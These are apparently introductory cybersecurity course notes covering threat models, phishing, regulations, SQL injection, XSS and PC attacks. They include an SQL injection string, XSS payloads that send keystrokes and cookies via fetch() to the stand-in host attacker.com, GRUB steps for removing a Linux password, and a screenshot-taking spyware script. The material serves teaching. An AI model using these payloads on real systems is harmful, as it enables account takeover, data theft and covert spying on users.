Andrés Fernández Muñoz CC BY-NC-SA 4.0
Curso de Introducción a la Ciberseguridad, CREA, ETSIDI-UPM
- 3.1 VULNERABILITIES
- 3.2 MALWARE
- 3.3 WEB SECURITY
- 3.3.1 Vulnerabilities
- 3.3.2 Examples
- 3.4 PC SECURITY
- 3.4.1 Vulnerabilities
- 3.4.2 Passwords atacks
- 3.4.3 Spyware example
STRIDE Model
| Threat | Impact |
|---|---|
| Spoofing | Autenticity |
| Tampering | Integrity |
| Repudiation | No repudio |
| Information disclosure | Confidenciality |
| Denial of Service | Availability |
| Elevation of privilege | Authorization |
Vulnerability definition: a weakness in a system that can be exploited by a threat actor to perform unauthorized actions within a computer system.
Vulnerabilities public databases:
Scores of vulnerabilities to prioritize most relevant
CVSS: (Common Vulnerability Scoring System) Impact of a vulnerability
EPSS: (Exploit Prediction Scoring System) Probability of a vulnerability to be exploited
| Type | Definition |
|---|---|
| Phishing | Fraudulent attempt to obtain sensitive information by disguising as a trustworthy entity |
| Spear phishing | Targeted phishing attack to a specific person or organization |
| Whaling | Phishing attack targeting high-profile individuals like executives |
| Vishing | Phishing attack using phone calls or voice messages |
| Smishing | Phishing attack using SMS messages |
| Homograph phishing | Use similar characters to the original ones |
Homograph phishing example:
www.bɑnco.com
www.banco.com
VirusTotal - Analyze suspicious files and URLs to detect types of malware
APT = Advanced persistent threat, long-term targeted attack
FW = Firewall
IDS/IPS = Intrusion detection system
EDR = Endpoint Detection Response
NDR = Network Detection Response
SIEM = Security Informations Events Management
Reglamento General de Protección de Datos (RGPD / GDPR)
- Obliga a notificar brechas de seguridad que afecten datos personales en 72h
- Art. 33 y 34: notificación a autoridades y comunicación a los interesados
- Multas de hasta 20 millones de euros o el 4% del volumen de negocio anual global
- Obliga también a informar a los usuarios sobre el uso y la recopilación de datos personales
- Una vez finalizado el fin del uso de los datos, los datos deben ser inmediatamente eliminados o anonimizados
ENS (Esquema Nacional de Seguridad)
- Obliga a organismos públicos y entidades colaboradoras a gestionar adecuadamente incidentes de seguridad
Ley 43/2010 y Ley 8/2011 (España)
- Regulan la protección de infraestructuras críticas y ciberseguridad nacional
Organismos relevantes
- INCIBE, CCN-CERT, ENISA, AEPD
Teléfono 017 => INCIBE Instituto Nacional de Ciberseguridad
URL Structure: protocol://user:password@hostname:port/path?query#fragment
https://foo:bar@example.com:443/path/to/doc.html?p1=v1&p2=v2#top
An sql injection attack consists of inserting or "injecting" a SQL query via the input data from the client to the application. Container demo: http://localhost:8000
-- Insert the atack in the form:
' OR '1'='1
-- PHP query call:
SELECT * FROM users WHERE username = '[]' AND password = '[]';
-- Result query:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';
An XSS attack consists of injecting malicious scripts into other websites. Container demo: http://localhost:8002
<!-- Webside currpution: -->
<script>document.body.innerHTML = "<h1>You have been hacked</h1>";</script>
<!-- Keylogger example: -->
<script>
document.onkeypress = function(e) {
fetch("http://attacker.com/log?key=" + e.key);
}
</script>
<!-- Unauthorized access: -->
<script>window.location="http://attacker.com/login"</script>
<!-- Cookies theft: -->
<script>fetch("http://attacker.com/steal?cookie=" + document.cookie)</script>
- Rubber ducky: USB that insert malware in the PC
- Keylogger: Malware that stores the users keyboard history
- Cain & Abel: Software that can attempt to crack hashed passwords:
Delete linux password:
# 1. Open GRUB menu (esc)
# 2. Press "e"
# 3. Add in code:
# ... handoff "rw init=/bin/bash"
# 4. Press F10
# 5. Delete password in /etc/shadow
# 6. RestartProgram that stores continusly screenshoots:
#!/bin/bash
SCRIPT_DIR="$(dirname "$(realpath "$0")")"
while true; do
sleep 300
TIMESTAMP=$(date +"%Y-%m-%dT%H:%M:%S")
FILENAME="captura_${TIMESTAMP}.png"
gnome-screenshot -f "$SCRIPT_DIR/$FILENAME"
done